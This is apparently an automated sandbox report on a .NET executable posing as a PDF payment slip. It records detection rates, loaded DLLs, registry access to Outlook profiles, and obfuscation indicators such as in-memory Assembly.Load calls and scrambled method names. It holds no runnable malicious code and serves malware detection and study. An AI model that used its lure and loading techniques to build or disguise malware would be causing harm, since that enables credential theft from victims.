                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Swift Copy TT USDUSD$23,401.PDF.exeVirustotal: Detection: 47%
                Source: Swift Copy TT USDUSD$23,401.PDF.exeReversingLabs: Detection: 34%
                Source: unknownProcess created: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe"
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess created: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe"
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess created: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe "C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Swift Copy TT USDUSD$23,401.PDF.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: YuCz.pdbSHA256 source: Swift Copy TT USDUSD$23,401.PDF.exe
                Source: Binary string: YuCz.pdb source: Swift Copy TT USDUSD$23,401.PDF.exe

Data Obfuscation

Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.3cb9f78.4.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.3c99f58.0.raw.unpack, MainForm.cs | .Net Code: _200C_202A_200E_202D_202D_206E_202D_202E_202A_206A_200E_202D_206B_206B_206E_206A_202C_206E_202E_200D_206B_206E_202C_202C_202B_200E_200C_202B_202C_206E_200D_200E_206C_202A_202E_206C_202B_202D_206B_200C_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, QN8LhUv7Bq01pTrSfL.cs | .Net Code: t5GSXymohC System.Reflection.Assembly.Load(byte[])
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, QN8LhUv7Bq01pTrSfL.cs | .Net Code: t5GSXymohC System.Reflection.Assembly.Load(byte[])
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, QN8LhUv7Bq01pTrSfL.cs | .Net Code: t5GSXymohC System.Reflection.Assembly.Load(byte[])
Source: Swift Copy TT USDUSD$23,401.PDF.exe | Static PE information: 0xC4737DD4 [Mon Jun 11 00:39:48 2074 UTC]
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 0_2_07637298 push cs; ret 0_2_07637299
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 2_2_010C9C30 push esp; retf 02B2h 2_2_010C9D55
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 2_2_069A87EB push es; ret 2_2_069A8920
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 2_2_069A38DF push eax; iretd 2_2_069A38F2
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 2_2_069A8822 push es; ret 2_2_069A8920
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 2_2_069A8863 push es; ret 2_2_069A8920
Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exe | Code function: 2_2_069A39D5 push edx; iretd 2_2_069A39DA
Source: Swift Copy TT USDUSD$23,401.PDF.exe | Static PE information: section name: .text entropy: 7.682429345056732
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, GAk8ihtBa5W1IjF2oS.cs | High entropy of concatenated method names: 'FYGnlNxysf', 'xOVnGwpYl5', 'uPtnogQOkG', 'wwLoClvjtY', 'aKYozJjbJY', 'R7ZnNdLlUr', 'JatnJsa0pC', 'hYin31KGid', 'NIQnwmvcs1', 'SV3nSjlQLG'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, nQ7wrtOUeqtYQkPrOP.cs | High entropy of concatenated method names: 'Db8M4R0Hmp', 'js1MrA49jI', 'mmEMgHZsD4', 'ey6MxSPn8a', 'SagMHB3QYe', 'E71M1JAk3J', 'P93Mt0F4Lm', 'rCZMeJevIs', 'wQjMITYJHi', 'thmMYtBfS2'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, jU4QiGWcKqOGdqRA7H.cs | High entropy of concatenated method names: 'ToString', 'JDDqsYAahk', 'KKNqrG6Nbk', 'eyaqg4SsuQ', 'DvxqxgJ5Ir', 'PRxqHlU6ba', 'Rbnq1lbe6o', 'HZ9qtieX1g', 'KLHqevNFOc', 'MMWqINxIs6'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, Cvg56jCKLuGN9qnAmj.cs | High entropy of concatenated method names: 'RgOUGfp5YA', 'TOKU0BTw5s', 'tDUUoFBWiH', 'tB3UndQGbT', 'XUgUM2tVr2', 'JlnUvhVJvT', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, A2a2n9jgNGDhXoeYbl.cs | High entropy of concatenated method names: 'cE6MTvx2ta', 'vCaMhMjhRn', 'vt3MMaK9LQ', 'BUqMfXOvPA', 'roDMA5BIcD', 'ywxMcw37ol', 'Dispose', 'eMHFlFOBhO', 'UntFLiu6c3', 'dJ7FGj1rer'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, rMB5jG4QCpHfhvHovr.cs | High entropy of concatenated method names: 'OLTo90hjoo', 'REXoL2T6rL', 'P4qo0uPjd0', 'SI3ontHvC4', 'IyJovVxWkW', 'zZY0uuorgs', 'Eq30Bh4von', 'YiU0jZKtRQ', 'b8T0EDQK0o', 'VDZ0OuosmW'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, YiBkDligENmtVURwGC.cs | High entropy of concatenated method names: 'scTh7SGolb', 'Xx0h6MOZ07', 'ToString', 'aENhlTZeKH', 'jyuhLBCgiK', 'jTphGyDTBk', 'gRoh0OjOJj', 'BViho7rOfC', 'E66hnnSU1J', 'vLohvF7A5U'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, HBAAU6Zc1wT5mNwguv.cs | High entropy of concatenated method names: 'aCq0R2Hdxh', 'BMd0KHl48O', 'B9yGgV0XAt', 'KcmGxvgcVX', 'mFRGHggDcH', 'bNKG1wmEBF', 'IMTGtpdEMY', 'JZDGe6h5Yp', 'vYJGIAD3LR', 'jRWGYHTbFH'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, BQD6XWzbHEffuGqKR0.cs | High entropy of concatenated method names: 'kWWUmXHWUK', 'EO6UQmevYC', 'y4MUkWs9ud', 'JuOU4RFqFs', 'Oc4UrXXNov', 'r32Ux4UiCt', 'l9BUHqvXWB', 'lW3Uct9Jgs', 'EwBU8ECyLh', 'TpfUpLLUFI'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, fqhchwBgphISV1i3HW.cs | High entropy of concatenated method names: 'VYQhEmLMc9', 'TEKhCrGr8Y', 'UmaFNdJCOs', 'mWfFJGITvM', 'u6Fhsurqgu', 'rENh2Z6wfJ', 'fvehafKeIe', 'JTjhVsxBvF', 'qqKhP29f31', 'r44hW3AKFM'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, OPPpkDkjPXW6MvfLTh.cs | High entropy of concatenated method names: 'A2TGDtB9BW', 'KrmGm5PerZ', 'c77GQ1Dy7x', 'OGpGkRQFOr', 'YAoGTLR4SH', 'EP8Gq7bLyK', 'dIFGh1gVEB', 'kH2GFZuGhN', 'FPmGMn3D0a', 'iy5GUfSIfn'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, QN8LhUv7Bq01pTrSfL.cs | High entropy of concatenated method names: 'ittw9bmqBI', 'LDiwlJ1Vx8', 'YHgwLwCWp3', 'auKwGRkx7u', 'p5Pw0j2qef', 'F6IwosHllH', 'xQ2wngomO6', 'kVXwvrqq3h', 'YGDw5iL08O', 'bflw7BhXQS'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, sphcUmQKOWkVh4kjRk.cs | High entropy of concatenated method names: 'QB7LVw5mcx', 'VHkLPstL5w', 'f46LWYkC3h', 'xalLiyHD7F', 'OFwLuDBS5l', 'rYwLBSZZqS', 'PakLjIbFlF', 'S6WLEYkL0x', 'R8aLOx6tjA', 'F0QLCrFaAo'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, brR4fRI3jDiiDKeLQt.cs | High entropy of concatenated method names: 'Bcqn8NaLmS', 'PXRnpmqrv8', 'UlanX3i8Pc', 'R1TnDVFf9p', 'QBDnROCfJE', 'ga8nmFSM1Y', 'YapnKUuusg', 'OnOnQavg4D', 'lAPnkaVMYu', 'cIonZQjllw'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, OP5y05SJkYcDfUh8rR.cs | High entropy of concatenated method names: 'z1UJnphcUm', 'COWJvkVh4k', 'AjPJ7XW6Mv', 'tLTJ6hrBAA', 'awgJTuvMMB', 'ljGJqQCpHf', 'EnneT0fmsqaX4YKcF2', 'r0Mi8UD0tZdAXtvaN8', 'sCAJJZoexA', 'W62Jw9yxDR'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, wlMmXiamMflVnhmrlw.cs | High entropy of concatenated method names: 'wCldQyZ4kP', 'PnvdkTViGj', 'eDKd4HlZe1', 'SDrdrh6vR2', 'VuAdxSdsuM', 'SsddH75tVO', 'qsvdtoHgPa', 'W9SdeepSjO', 'kn3dYuHwGa', 'WdJdsHseQb'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, sFr5UQ3VBmJh4eof1E.cs | High entropy of concatenated method names: 'ng6Xj58xJ', 'KZRDLqdwD', 'Jv8mPhmsx', 'rGFKOhZW5', 'hL1kOjnnr', 'ksLZtM7Ro', 'e1YaOdGlHTresbxUDQ', 'DlDLl23ljtNNi3L0Jm', 'Q37FBm4g7', 'ICfU7HnKT'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, hv2DojJN0ku3NnWw1iq.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y9sUscGeVe', 'bdAU2lw3Pc', 'rQfUaRC3TA', 'aoUUVPCuYZ', 'S7lUPQn3U8', 'jNPUWxHSUg', 'bXEUioEja1'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, wPm8JEVKZAg6qnsJjZ.cs | High entropy of concatenated method names: 'iIWTY0T8MD', 'YwTT2GljJE', 'C5FTVH0ORo', 'VfpTPbZalW', 'onQTrA221k', 'yl7TgeByDM', 'E4WTxZwABU', 'xB8THXg2Bx', 'MBNT1m6CDK', 'EOJTtDqys8'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, VbT0MOLP8g50MBtTv3.cs | High entropy of concatenated method names: 'Dispose', 'hDhJOXoeYb', 'iwi3rtt17J', 'Mwxa1b5Qna', 'fV4JCS0v8D', 'p3XJzCQFZs', 'ProcessDialogKey', 'uv63NQ7wrt', 'seq3JtYQkP', 'GOP33Kvg56'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, HKxMO2JJUh9Xie2wOrL.cs | High entropy of concatenated method names: 'd1lUCO2c2u', 'NOBUzv8kq3', 'kbwfNRuLal', 'GW2fJHkYfa', 'PpVf3AcO2q', 'cLmfwbRKUn', 'SjVfSJEyTW', 'dOGf9nNk8j', 'DRifleVKN8', 'udFfL5Oo0f'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, wYYTswJScuZEGg3uOyx.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gbDyMA1YiI', 'GJdyU9IqKl', 'MEKyf4mVgt', 'wIOyyfN2Kx', 'AtOyA5QFiF', 'vZBybivFWR', 'wLFycb6Wml'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, GAk8ihtBa5W1IjF2oS.cs | High entropy of concatenated method names: 'FYGnlNxysf', 'xOVnGwpYl5', 'uPtnogQOkG', 'wwLoClvjtY', 'aKYozJjbJY', 'R7ZnNdLlUr', 'JatnJsa0pC', 'hYin31KGid', 'NIQnwmvcs1', 'SV3nSjlQLG'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, nQ7wrtOUeqtYQkPrOP.cs | High entropy of concatenated method names: 'Db8M4R0Hmp', 'js1MrA49jI', 'mmEMgHZsD4', 'ey6MxSPn8a', 'SagMHB3QYe', 'E71M1JAk3J', 'P93Mt0F4Lm', 'rCZMeJevIs', 'wQjMITYJHi', 'thmMYtBfS2'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, jU4QiGWcKqOGdqRA7H.cs | High entropy of concatenated method names: 'ToString', 'JDDqsYAahk', 'KKNqrG6Nbk', 'eyaqg4SsuQ', 'DvxqxgJ5Ir', 'PRxqHlU6ba', 'Rbnq1lbe6o', 'HZ9qtieX1g', 'KLHqevNFOc', 'MMWqINxIs6'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, Cvg56jCKLuGN9qnAmj.cs | High entropy of concatenated method names: 'RgOUGfp5YA', 'TOKU0BTw5s', 'tDUUoFBWiH', 'tB3UndQGbT', 'XUgUM2tVr2', 'JlnUvhVJvT', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, A2a2n9jgNGDhXoeYbl.cs | High entropy of concatenated method names: 'cE6MTvx2ta', 'vCaMhMjhRn', 'vt3MMaK9LQ', 'BUqMfXOvPA', 'roDMA5BIcD', 'ywxMcw37ol', 'Dispose', 'eMHFlFOBhO', 'UntFLiu6c3', 'dJ7FGj1rer'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, rMB5jG4QCpHfhvHovr.cs | High entropy of concatenated method names: 'OLTo90hjoo', 'REXoL2T6rL', 'P4qo0uPjd0', 'SI3ontHvC4', 'IyJovVxWkW', 'zZY0uuorgs', 'Eq30Bh4von', 'YiU0jZKtRQ', 'b8T0EDQK0o', 'VDZ0OuosmW'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, YiBkDligENmtVURwGC.cs | High entropy of concatenated method names: 'scTh7SGolb', 'Xx0h6MOZ07', 'ToString', 'aENhlTZeKH', 'jyuhLBCgiK', 'jTphGyDTBk', 'gRoh0OjOJj', 'BViho7rOfC', 'E66hnnSU1J', 'vLohvF7A5U'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, HBAAU6Zc1wT5mNwguv.cs | High entropy of concatenated method names: 'aCq0R2Hdxh', 'BMd0KHl48O', 'B9yGgV0XAt', 'KcmGxvgcVX', 'mFRGHggDcH', 'bNKG1wmEBF', 'IMTGtpdEMY', 'JZDGe6h5Yp', 'vYJGIAD3LR', 'jRWGYHTbFH'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, BQD6XWzbHEffuGqKR0.cs | High entropy of concatenated method names: 'kWWUmXHWUK', 'EO6UQmevYC', 'y4MUkWs9ud', 'JuOU4RFqFs', 'Oc4UrXXNov', 'r32Ux4UiCt', 'l9BUHqvXWB', 'lW3Uct9Jgs', 'EwBU8ECyLh', 'TpfUpLLUFI'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, fqhchwBgphISV1i3HW.cs | High entropy of concatenated method names: 'VYQhEmLMc9', 'TEKhCrGr8Y', 'UmaFNdJCOs', 'mWfFJGITvM', 'u6Fhsurqgu', 'rENh2Z6wfJ', 'fvehafKeIe', 'JTjhVsxBvF', 'qqKhP29f31', 'r44hW3AKFM'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, OPPpkDkjPXW6MvfLTh.cs | High entropy of concatenated method names: 'A2TGDtB9BW', 'KrmGm5PerZ', 'c77GQ1Dy7x', 'OGpGkRQFOr', 'YAoGTLR4SH', 'EP8Gq7bLyK', 'dIFGh1gVEB', 'kH2GFZuGhN', 'FPmGMn3D0a', 'iy5GUfSIfn'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, QN8LhUv7Bq01pTrSfL.cs | High entropy of concatenated method names: 'ittw9bmqBI', 'LDiwlJ1Vx8', 'YHgwLwCWp3', 'auKwGRkx7u', 'p5Pw0j2qef', 'F6IwosHllH', 'xQ2wngomO6', 'kVXwvrqq3h', 'YGDw5iL08O', 'bflw7BhXQS'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, sphcUmQKOWkVh4kjRk.cs | High entropy of concatenated method names: 'QB7LVw5mcx', 'VHkLPstL5w', 'f46LWYkC3h', 'xalLiyHD7F', 'OFwLuDBS5l', 'rYwLBSZZqS', 'PakLjIbFlF', 'S6WLEYkL0x', 'R8aLOx6tjA', 'F0QLCrFaAo'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, brR4fRI3jDiiDKeLQt.cs | High entropy of concatenated method names: 'Bcqn8NaLmS', 'PXRnpmqrv8', 'UlanX3i8Pc', 'R1TnDVFf9p', 'QBDnROCfJE', 'ga8nmFSM1Y', 'YapnKUuusg', 'OnOnQavg4D', 'lAPnkaVMYu', 'cIonZQjllw'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, OP5y05SJkYcDfUh8rR.cs | High entropy of concatenated method names: 'z1UJnphcUm', 'COWJvkVh4k', 'AjPJ7XW6Mv', 'tLTJ6hrBAA', 'awgJTuvMMB', 'ljGJqQCpHf', 'EnneT0fmsqaX4YKcF2', 'r0Mi8UD0tZdAXtvaN8', 'sCAJJZoexA', 'W62Jw9yxDR'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, wlMmXiamMflVnhmrlw.cs | High entropy of concatenated method names: 'wCldQyZ4kP', 'PnvdkTViGj', 'eDKd4HlZe1', 'SDrdrh6vR2', 'VuAdxSdsuM', 'SsddH75tVO', 'qsvdtoHgPa', 'W9SdeepSjO', 'kn3dYuHwGa', 'WdJdsHseQb'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, sFr5UQ3VBmJh4eof1E.cs | High entropy of concatenated method names: 'ng6Xj58xJ', 'KZRDLqdwD', 'Jv8mPhmsx', 'rGFKOhZW5', 'hL1kOjnnr', 'ksLZtM7Ro', 'e1YaOdGlHTresbxUDQ', 'DlDLl23ljtNNi3L0Jm', 'Q37FBm4g7', 'ICfU7HnKT'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, hv2DojJN0ku3NnWw1iq.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y9sUscGeVe', 'bdAU2lw3Pc', 'rQfUaRC3TA', 'aoUUVPCuYZ', 'S7lUPQn3U8', 'jNPUWxHSUg', 'bXEUioEja1'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, wPm8JEVKZAg6qnsJjZ.cs | High entropy of concatenated method names: 'iIWTY0T8MD', 'YwTT2GljJE', 'C5FTVH0ORo', 'VfpTPbZalW', 'onQTrA221k', 'yl7TgeByDM', 'E4WTxZwABU', 'xB8THXg2Bx', 'MBNT1m6CDK', 'EOJTtDqys8'
Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, VbT0MOLP8g50MBtTv3.cs | High entropy of concatenated method names: 'Dispose', 'hDhJOXoeYb', 'iwi3rtt17J', 'Mwxa1b5Qna', 'fV4JCS0v8D', 'p3XJzCQFZs', 'ProcessDialogKey', 'uv63NQ7wrt', 'seq3JtYQkP', 'GOP33Kvg56'
